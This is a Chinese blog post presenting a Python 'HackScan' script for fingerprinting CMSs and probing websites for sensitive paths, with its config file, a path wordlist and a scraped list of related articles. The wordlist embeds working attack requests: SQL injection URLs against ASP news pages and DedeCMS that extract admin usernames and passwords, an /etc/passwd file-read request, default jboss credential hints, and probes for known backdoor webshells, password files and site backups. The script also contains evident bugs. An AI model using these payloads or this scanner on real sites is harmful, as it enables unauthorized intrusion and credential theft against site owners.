前言:

之前逛SAFEING极客社区的时候

发现一款黑市卖2000多的软件,后面下载了

打不开。发现config文件里面有些不错的东西。总结了一下

有了以下的脚本。

脚本用处:

【1】探测CMS(不敢说百分百吧,起码准确率不低于80%) 加大了判断

【2】挖掘敏感目录下存在的漏洞

代码:

hack.py

  1. import requests
  2. import re
  3. import threading
  4. import json
  5. print('banner')
  6. banner=""" _ _ _ ____
  7. | | | | __ _ ___| | __/ ___| ___ __ _ _ __
  8. | |_| |/ _` |/ __| |/ /\___ \ / __/ _` | '_ \
  9. | _ | (_| | (__| < ___) | (_| (_| | | | |
  10. |_| |_|\__,_|\___|_|\_\|____/ \___\__,_|_| |_|
  11.  
  12. """
  13. print('[1]CMS识别与CMS特殊路径收集')
  14. print('[2]敏感目录扫描')
  15. print(banner)
  16. xz=input('请选择:')
  17. def ini():
  18. global e
  19. import configparser
  20. conf = configparser.ConfigParser()
  21. cmserror = []
  22. conf.read('hackscan.ini')
  23. error = conf.get('cmscanerror', 'error')
  24. error1 = conf.get('cmscanerror', 'error1')
  25. error2 = conf.get('cmscanerror', 'error2')
  26. error3 = conf.get('cmscanerror', 'error3')
  27. error4 = conf.get('cmscanerror', 'error4')
  28. error5 = conf.get('cmscanerror', 'error5')
  29. error6 = conf.get('cmscanerror', 'error6')
  30. error7 = conf.get('cmscanerror', 'error7')
  31. error8 = conf.get('cmscanerror', 'error8')
  32. error9 = conf.get('cmscanerror', 'error9')
  33. error10 = conf.get('cmscanerror', 'error10')
  34. error11 = conf.get('cmscanerror', 'error11')
  35. error12 = conf.get('cmscanerror', 'error12')
  36. cmserror.append(error1)
  37. cmserror.append(error2)
  38. cmserror.append(error3)
  39. cmserror.append(error4)
  40. cmserror.append(error5)
  41. cmserror.append(error6)
  42. cmserror.append(error7)
  43. cmserror.append(error8)
  44. cmserror.append(error9)
  45. cmserror.append(error10)
  46. cmserror.append(error11)
  47. cmserror.append(error12)
  48. for e in cmserror:
  49. pass
  50. ini()
  51. def cmsscan():
  52. user = input('输入要扫描的url:')
  53. print('[&]识别CMS,并扫描出CMS存活的路径')
  54. yuanheaders={'user-agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36'}
  55. yuan=user.rstrip().rstrip('/')
  56. yuans=requests.get(url=yuan,headers=yuanheaders,allow_redirects=False)
  57. yuanlen=len(yuans.text)
  58.  
  59. print('[@]扫描中....')
  60. with open('data.json', 'r') as b:
  61. a = json.load(b)
  62. lisw = eval(str(a))
  63. for x in lisw:
  64. cms=x['url']
  65. cmsname=x['name']
  66.  
  67. headers={'user-agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36'}
  68. urls=user.rstrip().rstrip('/')+cms
  69. cmssb=requests.get(url=urls,headers=headers,allow_redirects=False)
  70. cmslen=len(cmssb.text)
  71. if cmssb.status_code == 200 and yuanlen != cmslen:
  72. print('[*]识别到的CMSurl:{}'.format(cmssb.url))
  73. print('[*]CMS为:{}'.format(cmsname))
  74. else:
  75. pass
  76.  
  77. def mgscan():
  78. user = input('输入要扫描的url:')
  79. with open('漏洞.txt', 'r') as a:
  80. for x in a.readlines():
  81. url = re.findall('(.*?)\|\|', x.strip())
  82. names = re.findall('\|\|(.*)', x.strip())
  83. urls = "".join(url)
  84. payload=user.rstrip().rstrip('/')+urls
  85. namess="".join(names)
  86. headers = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36'}
  87. mgs=requests.get(url=payload,headers=headers,allow_redirects=False)
  88. if mgs.status_code == 200:
  89. if e in str(mgs.text):
  90. pass
  91. else:
  92. print('[*]扫描出的敏感目录:{}'.format(mgs.url))
  93. print(namess)
  94.  
  95. def main():
  96. while True:
  97. if xz == '':
  98. c=threading.Thread(target=cmsscan,args=())
  99. c.start()
  100. break
  101. elif xz == '':
  102. mgscan()
  103. m=threading.Thread(target=mgscan,args=())
  104. m.start()
  105. else:
  106. print('[-]输入不能为空!')
  107. continue
  108. main()

hacksca.ini

  1. [cmscanerror]
  2. error=找不到这个文件
  3. error1=找不到该网页
  4. error2=NotFound
  5. error3=这个网页迷失了
  6. error4=不存在
  7. error5=不存在该网页
  8. error6=404
  9. error7=您无权访问该网页
  10. error8=防火墙
  11. error9=没有这个网页
  12. error10=网页不见了
  13. error11=ERROR
  14. error12=errors

漏洞.txt

  1. /FCKeditor/editor/filemanager/connectors/uploadtest.html||File Upload|Fck上传,请手动检测
  2. /FCKeditor/editor/filemanager/connectors/uploadtest.html||查阅fckeditor漏洞利用
  3. /FCKeditor/editor/filemanager/upload/test.html||File Upload|Fck上传,请手动检测
  4. /FCKeditor/editor/filemanager/upload/test.html||查阅fckeditor漏洞利用
  5. /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php||Tinymce漏洞
  6. /adminer.php||MYSQL管理界面
  7. /wp-login.php||wordpress登陆界面
  8. /blog/wp-login.php||wordpress登陆界面
  9. /wordpress/wp-login.php||wordpress登陆界面
  10. /phpmyadmin/index.php||MYSQL管理界面
  11. /admin.txt||密码文件
  12. /pass.txt||密码文件
  13. /qq.txt||密码文件
  14. /bigdump.php||Php数据库管理文件 Exp:http://host/bigdump.php?start=
  15. /config.txt||密码文件
  16. /extras/curltest.php||ZENcart系统漏洞文件
  17. /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html||Opencart 1.4.9.1 - Remote File Upload Vulnerability
  18. /editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media||ZENcart系统漏洞文件
  19. /editors/fckeditor/editor/filemanager/upload/php/upload.php||FCK编辑器上传
  20. /includes/templates/template_default/buttons/english/button_add_address.gif||zencart系统
  21. /editors/htmlarea/plugins/ImageManager/images.php||Tinymce漏洞
  22. /editors/tiny_mce/plugins/ImageManager/manager.php||ZENcart系统漏洞文件
  23. /editors/tiny_mce/plugins/filemanager/pages/fm/index.html||Tinymce漏洞
  24. /.svn/entries||svn漏洞
  25. /NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='||SQL注入
  26. /WEB-INF/classes/jmx-console-users.properties||JSP敏感文件
  27. /admin/diy.asp||后们木马
  28. /admin/system/editor/FCKeditor/editor/fckeditor.Html||fckeditor漏洞
  29. /autogetarticle/_GetLockPic.php?p=/etc/passwd||查阅"DoNews任意文件下载
  30. /diy.asp||后门木马
  31. /editor/editor/filemanager/browser/default/connectors/test.html|File Upload|Fck上传,请手动检测
  32. /editor/editor/filemanager/browser/default/connectors/test.html||查阅fckeditor漏洞利用
  33. /editor/editor/filemanager/connectors/test.html|File Upload|Fck上传,请手动检测
  34. /editor/editor/filemanager/connectors/test.html||查阅fckeditor漏洞利用
  35. /editor/editor/filemanager/connectors/uploadtest.html|File Upload|Fck上传,请手动检测
  36. /editor/editor/filemanager/connectors/uploadtest.html||查阅fckeditor漏洞利用
  37. /editor/editor/filemanager/upload/test.html||查阅fckeditor漏洞利用
  38. /fckeditor/editor/filemanager/browser/default/connectors/test.html|www.fckeditor.net|Fck上传,请手动检测
  39. /fckeditor/editor/filemanager/browser/default/connectors/test.html||查阅fckeditor漏洞利用
  40. /fckeditor/editor/filemanager/connectors/test.html|File Upload|Fck上传,请手动检测
  41. /fckeditor/editor/filemanager/connectors/test.html||查阅fckeditor漏洞利用
  42. /includes/modules/payment/alipay.php||查alipay.php利用
  43. /plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a||DEDE注入漏洞
  44. /plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a||DEDE注入漏洞
  45. /web-console/||用admin-admin尝试登录-jboss漏洞
  46. /webmanage/FCKeditor/editor/filemanager/connectors/uploadtest.html||查阅fckeditor漏洞利用
  47. /webmanage/fckeditor/editor/filemanager/browser/default/connectors/test.html||查阅fckeditor漏洞利用
  48. /webmanage/fckeditor/editor/filemanager/connectors/test.html||查阅fckeditor漏洞利用
  49. /1.rar||敏感文件
  50. /1.zip||敏感文件
  51. /147.rar||敏感文件
  52. /2.rar||敏感文件
  53. /2.zip||敏感文件
  54. /369.rar||敏感文件
  55. /HYTop.mdb||木马备份的整站
  56. /Upfile_AdPia.asp||上传后缀
  57. /Upfile_AdPic.asp||上传后缀
  58. /Upfile_Articla.asp||上传后缀
  59. /Upfile_Article.asp||上传后缀
  60. /Upfile_Dialog.asp||上传后缀
  61. /Upfile_OrderPic.asp||上传后缀
  62. /admimistrator||可能为管理员后台路径
  63. /admin.rar||关键文件
  64. /admin.zip||关键文件
  65. /admin||可能为管理员后台路径
  66. /c99.php|s|老外木马,有通杀后门http://www.blackploit.com/2014/06/backdoor-en-shell-c99php-bypass-password.html
  67. /data.rar||数据库文件
  68. /data.zip||数据库文件
  69. /db.rar||数据库文件
  70. /db.zip||数据库文件
  71. /fdsa.rar||整站文件
  72. /fdsa.zip||整站文件
  73. /flashfxp.rar||关键文件
  74. /flashfxp.zip||关键文件
  75. /ftp.txt||密码文件
  76. /gg.rar||关键文件
  77. /manage||可能为管理员后台路径
  78. /password.txt||密码文件
  79. /root.rar||整站文件
  80. /root.zip||整站文件
  81. /sb.rar||敏感文件
  82. /server.rar||敏感文件
  83. /server/default/conf/props/jmx-console-users.propertie||查阅jboss漏洞
  84. /sf.rar||敏感文件
  85. /shop.mdb||敏感文件
  86. /sql.rar||敏感文件
  87. /test.rar||敏感文件
  88. /unix.rar||敏感文件
  89. /upfile.asp||上传后缀
  90. /upfile_adpic.asp||上传后缀
  91. /upfile_flash.asp||上传后缀
  92. /upfile_photo.asp||上传后缀
  93. /upfile_softpic.asp||上传后缀
  94. /upload.asp||上传后缀
  95. /user.dat||敏感文件
  96. /user.rar||敏感文件
  97. /vip.rar||关键文件
  98. /wangzhan.rar||整站文件
  99. /wangzhan.zip||整站文件
  100. /web.rar||整站文件
  101. /web.zip||整站文件
  102. /wo.rar||敏感文件
  103. /www.rar||整站文件
  104. /www.zip||整站文件
  105. /wwwroot.rar||整站文件
  106. /wwwroot.zip||整站文件
  107. /wz.rar||整站文件
  108. /wz.zip||整站文件
  109. /复件 wwww.rar||关键文件
  110. /复件 新建文件夹.rar||关键文件
  111. /新建文件夹.rar||关键文件
  112. /新建文件夹.zip||关键文件
  113. /软件.rar||关键文件

data.json

点我:https://paste.ubuntu.com/p/yhpKvCZvK6/

测试结果:

这个脚本会不定期更新

python写个Hack Scan的更多相关文章

  1. Python写各大聊天系统的屏蔽脏话功能原理

    Python写各大聊天系统的屏蔽脏话功能原理 突然想到一个视频里面弹幕被和谐的一满屏的*号觉得很有趣,然后就想用python来试试写写看,结果还真玩出了点效果,思路是首先你得有一个脏话存放的仓库好到时 ...

  2. python写红包的原理流程包含random,lambda其中的使用和见简单介绍

    Python写红包的原理流程 首先来说说要用到的知识点,第一个要说的是扩展包random,random模块一般用来生成一个随机数 今天要用到ramdom中unifrom的方法用于生成一个指定范围的随机 ...

  3. Python写地铁的到站的原理简易版

    Python地铁的到站流程及原理(个人理解) 今天坐地铁看着站牌就莫名的想如果用Python写其工作原理 是不是很简单就小试牛刀了下大佬们勿喷纯属小弟个人理解 首先来看看地铁上显示的站牌如下: 就想这 ...

  4. 用Python写一个简单的Web框架

    一.概述 二.从demo_app开始 三.WSGI中的application 四.区分URL 五.重构 1.正则匹配URL 2.DRY 3.抽象出框架 六.参考 一.概述 在Python中,WSGI( ...

  5. 读书笔记汇总 --- 用Python写网络爬虫

    本系列记录并分享:学习利用Python写网络爬虫的过程. 书目信息 Link 书名: 用Python写网络爬虫 作者: [澳]理查德 劳森(Richard Lawson) 原版名称: web scra ...

  6. Python写UTF8文件,UE、记事本打开依然乱码的问题

    Python写UTF8文件,UE.记事本打开依然乱码的问题 Leave a reply 现象:使用codecs打开文件,写入UTF-8文本,正常无错误.用vim打开正常,但记事本.UE等打开乱码. 原 ...

  7. python 写的http后台弱口令爆破工具

    今天来弄一个后台破解的Python小程序,哈哈,直接上代码吧,都有注释~~ 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 ...

  8. python写xml文件

    为了便于后续的读取处理,这里就将信息保存在xml文件中,想到得到的文件如下: 1 <?xml version="1.0" encoding="utf-8" ...

  9. Python之美[从菜鸟到高手]--一步一步动手给Python写扩展(异常处理和引用计数)

    我们将继续一步一步动手给Python写扩展,通过上一篇我们学习了如何写扩展,本篇将介绍一些高级话题,如异常,引用计数问题等.强烈建议先看上一篇,Python之美[从菜鸟到高手]--一步一步动手给Pyt ...

随机推荐

  1. JAVA怎么在函数内改变传入的值

    public class TestInt { public int aa(int i) { return i+4; } public static void main(String [] args) ...

  2. 怎么解决安装SqlServer2008总是提示Restart computer as failed

    安装SqlServer2008总是提示Restart computer as failed,重启电脑依然报这个錯.解决办法是在cmd窗口中使用命令setup.exe /SkipRules=Reboot ...

  3. 有关linux中,<math.h>的调用方法

    h{font-weight:bold;color:green;font-size:105%} p{font-size:100%} linux下C语言程序中,若要用到math.h中的函数(如:sin() ...

  4. linux下修改了tomcat端口之后无法访问

    查看防火墙,是否将修改之后的端口加入防火墙规则内,如没有,加入规则内,重启防火墙,如果还是无法访问,请看第二步 执行bin目录下shutdown.sh脚本,如果正常关闭,则执行startup.sh脚本 ...

  5. CaptureMouse/CaptureStylus 可能会失败

    在 WPF 中,如果我们要做拖动效果,通常会调用一下 CaptureMouse/CaptureStylus 以便当鼠标或手指离开控件的时候依然能够响应 Move 和 Up 事件.不知有没有注意到这两个 ...

  6. 【数据库】sql连表查询

    SQL总结 连表查询 连接查询包括合并.内连接.外连接和交叉连接,如果涉及多表查询,了解这些连接的特点很重要. 只有真正了解它们之间的区别,才能正确使用. 1.Union UNION 操作符用于合并两 ...

  7. PF不明内存泄露已解决,白头发也没了(转)

    在使用OpenExpressApp进行WPF应用开发过程中遇到多个内存泄漏的地方,在上一篇中求助了一个内存泄露问题[WPF不明内存泄露原因,头发都白了几根],本篇与大家分享一下如何解决此问题的过程. ...

  8. 使用gopherjs 进行web 应用开发

    1. 安装 go get -u github.com/gopherjs/gopherjs 2. 基本代码使用 备注: 这个只是一个简单的demo,进行pi 运算,结果还真是快 a. code gola ...

  9. virtual之虚函数,虚继承

    当类中包含虚函数时,则该类每个对象中在内存分配中除去数据外还包含了一个虚函数表指针(vfptr),指向虚函数表(vftable),虚函数表中存放了该类包含的虚函数的地址. 当子类通过虚继承的方式从父类 ...

  10. YARN的Fair Scheduler和Capacity Scheduler

    关于Scheduler YARN有四种调度机制:Fair Schedule,Capacity Schedule,FIFO以及Priority: 其中Fair Scheduler是资源池机制,进入到里面 ...